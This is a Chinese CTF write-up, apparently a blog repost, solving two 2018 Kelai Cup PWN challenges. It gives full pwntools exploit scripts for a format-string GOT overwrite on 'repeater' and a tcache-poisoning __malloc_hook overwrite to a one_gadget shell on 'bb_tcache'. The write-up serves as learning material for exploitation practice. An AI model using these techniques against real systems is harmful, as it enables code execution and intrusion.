2018科来杯PWN复现(一)

  • A+
所属分类:逆向工程

2018科来杯PWN复现(一)

题目附件:

https://pan.baidu.com/s/1_rwQCWIeII8zTQSdkTgPVw

提取码: jpzx

感谢 CataLpa 师傅给的题目

https://wzt.ac.cn/


repeater


32 位的程序,存在很明显的格式化字符串漏洞


2018科来杯PWN复现(一)


数一下偏移,第四个


2018科来杯PWN复现(一)


有个 cat flag 的后门 0x8048616,但是有一个 number 限制,nubmer 要等于 8216 才行,可以直接让他执行 0x8048638 那一块,那就覆写 puts 函数的 got 表把


2018科来杯PWN复现(一)

from pwn import *
context.log_level = 'DEBUG'
p = process("./repeater")
elf=ELF('./repeater')
puts_got=elf.got['puts']
p.recvuntil("your msg:")
payload = fmtstr_payload(4,{puts_got:0x8048638})
p.sendline(payload)
p.interactive()


2018科来杯PWN复现(一)


bb_tcache


程序的逻辑挺简单的,free 之后没有置为 NULL

另外还提供了 system 的地址,可以直接拿来算 libc 的基址了


2018科来杯PWN复现(一)

from pwn import *
context.log_level = 'DEBUG'
p=process('bb_tcache')
elf=ELF('bb_tcache')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

def alloc():
  p.sendlineafter("4. quit!n","1")

def release():
  p.sendlineafter("4. quit!n","2")

def fill(content):
  p.sendlineafter("4. quit!n","3")
  p.sendafter("something.n",content)

p.recvuntil("need this: ")
sys_addr = int(p.recvuntil('n', drop=True).strip(), 16)
libc_base = sys_addr - libc.symbols["system"]
malloc_hook = libc_base + libc.symbols["__malloc_hook"]
one_gadget = libc_base + 0x10a45c
alloc()
release()
fill(p64(malloc_hook))
alloc()
alloc()
fill(p64(one_gadget))
alloc()
p.interactive()


首先 malloc 一个,free 之后再去编辑,编辑成 malloc_hook(tcache 不会对 size 进行检查,所以可以直接申请到 malloc_hook 这里)

然后 malloc 两次就申请到了 malloc_hook 那里了,再去编辑就可以把 malloc_hook 改为 one_gadget 的地址,这样去 malloc 的时候就可以拿到 shell


2018科来杯PWN复现(一)


啊啊啊,好简单的说

本文始发于微信公众号(陈冠男的游戏人生):2018科来杯PWN复现(一)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: